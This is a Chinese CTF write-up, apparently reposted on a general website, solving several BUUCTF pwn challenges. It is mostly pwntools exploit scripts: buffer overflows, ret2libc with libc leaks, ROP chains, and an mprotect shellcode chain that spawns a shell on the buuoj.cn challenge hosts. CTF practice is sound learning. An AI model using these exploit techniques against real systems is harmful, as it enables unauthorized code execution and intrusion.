32题 BUUCTF-PWN-第一页writep( 二 ) _生活百科

文章插图
如图，QWORD 代表代表了两个字节，将var[17]赋值为17即可
from pwn import*#p = process("./1")p = remote("node4.buuoj.cn", 29946)p.recv()payload = b'a'*13*4 + p64(0x11)#payload = p32(17)*14p.sendline(payload)p.interactive()jarvisoj_level2from pwn import *from LibcSearcher import *context.log_level='debug'#p = remote('node4.buuoj.cn', 27484)p = process('pwn')elf = ELF('pwn')p.recv()payload = b'a'*140 + p32(elf.sym['system']) + p32(0) + p32(next(elf.search(b'/bin/sh\x00')))p.sendline(payload)p.interactive()p.recv()bjdctf_2020_babystackfrom pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 27053)elf = ELF('pwn')p.recv()payload = b'a'*24 + p64(elf.sym['backdoor'])p.sendline(b'50')p.recv()p.sendline(payload)p.interactive()[OGeek2019]babyropmain

文章插图
sub_804871F

文章插图
sub_80487D0

文章插图
明显的 ret2libc ，搜先要绕过 strncmp 的检测，这里可以用截断符绕过其次是第二个函数写入的 buf 的字节数要尽可能的大，所以要覆盖 buf[7]，注意这里修改为 127 也是不够的，得修改大些from pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 28494)elf = ELF('pwn')payload = b'\x00' + b'\xff'*7p.sendline(payload)p.recv()payload = b'a'*235 + p32(elf.sym['puts']) + p32(0x8048825) + p32(elf.got['puts'])p.send(payload)puts_addr = u32(p.recvuntil(b'\xf7'))print(hex(puts_addr))libc = ELF('buu/libc-2.23.so')libcbase = puts_addr - libc.sym['puts']system = libcbase + libc.sym['system']binsh = libcbase + next(libc.search(b'/bin/sh\x00'))payload = b'\x00' + b'\xff'*7p.sendline(payload)p.recv()payload = b'a'*235 + p32(system) + p32(0) + p32(binsh)p.sendline(payload)p.interactive()get_started_3dsctf_2016有个坑点，如果没有跳转到exit函数结束的话，程序不能够回显，即flag不会被输出到屏幕上
from pwn import *from LibcSearcher import *context.log_level = 'debug'#context(os='linux', arch='amd64')#p = process('./1')p = remote('node4.buuoj.cn', 27088)elf = ELF('1')exit_addr = elf.symbols['exit']getflag_addr = elf.symbols['get_flag']payload = b'a'*56 + p32(getflag_addr) + p32(exit_addr) + p32(0x308CD64F) + p32(0x195719D1)p.sendline(payload)print(p.recv())另外的方法，利用 mprotect 函数写入 shellcode 执行我们可以通过 mprotect 函数将一段内存设置成可执行内存，来执行shellcode需要指出的是，指定的内存区间必须包含整个内存页（4K）。区间开始的地址start必须是一个内存页的起始地址，并且区间长度len必须是页大小的整数倍。就这样，我们就可以将一段地址弄成可以执行的了。因为程序本身也是静态编译，所以地址是不会变的。由于要是页的整数倍，所以我们取内存起始地址为 0x080eb000 ，大小为 0x1000，prot为7找到能 pop 3 的指令

文章插图
于是我们构造以下payload

文章插图
from pwn import *from LibcSearcher import *context.log_level = 'debug'#context(os='linux', arch='amd64')#p = process('./1')p = remote('node4.buuoj.cn', 27088)elf = ELF('1')pop3_addr = 0x0806fc08mprotect_addr = elf.symbols['mprotect']read_addr = elf.symbols['read']buf_addr = 0x080eb000payload = b'a'*56payload += p32(mprotect_addr) + p32(pop3_addr) + p32(buf_addr) + p32(0x1000) + p32(0x7)payload += p32(read_addr) + p32(pop3_addr) + p32(0) + p32(buf_addr) + p32(0x100)payload += p32(buf_addr)p.sendline(payload)shellcode = asm(shellcraft.sh())p.sendline(shellcode)p.interactive()jarvisoj_level2_x6464位下的 ret2text
from pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 28941)elf = ELF('pwn')rdi = 0x4006b3payload = b'a'*0x88 + p64(rdi) + p64(next(elf.search(b'/bin/sh\x00'))) + p64(elf.sym['system'])p.recv()p.sendline(payload)p.interactive()[HarekazeCTF2019]baby_ropfrom pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 27109)elf = ELF('pwn')rdi = 0x400683payload = b'a'*0x18 + p64(rdi) + p64(next(elf.search(b'/bin/sh\x00'))) + p64(elf.sym['system'])p.recv()p.sendline(payload)p.interactive()ciscn_2019_en_2from pwn import *from LibcSearcher import *context.log_level='debug'#p = process('pwn')p = remote('node4.buuoj.cn', 29131)elf = ELF('pwn')ret = 0x4006b9rdi = 0x400c83p.recv()p.sendline(b'1')payload = b'\x00' + b'a'*0x57 + p64(rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(elf.sym['main'])p.sendlineafter(b'Input your Plaintext to be encrypted\n', payload)puts_addr = u64(p.recvuntil(b'\x7f')[-6:].ljust(8, b'\x00'))#print(hex(puts_addr))libc = ELF('buu/libc-2.27-x64.so')libcbase = puts_addr - libc.sym['puts']system = libcbase + libc.sym['system']binsh = libcbase + next(libc.search(b'/bin/sh\x00'))p.recv()p.sendline(b'1')payload = b'\x00' + b'a'*0x57 + p64(ret) + p64(rdi) + p64(binsh) + p64(system)p.sendlineafter(b'Input your Plaintext to be encrypted\n', payload)p.interactive()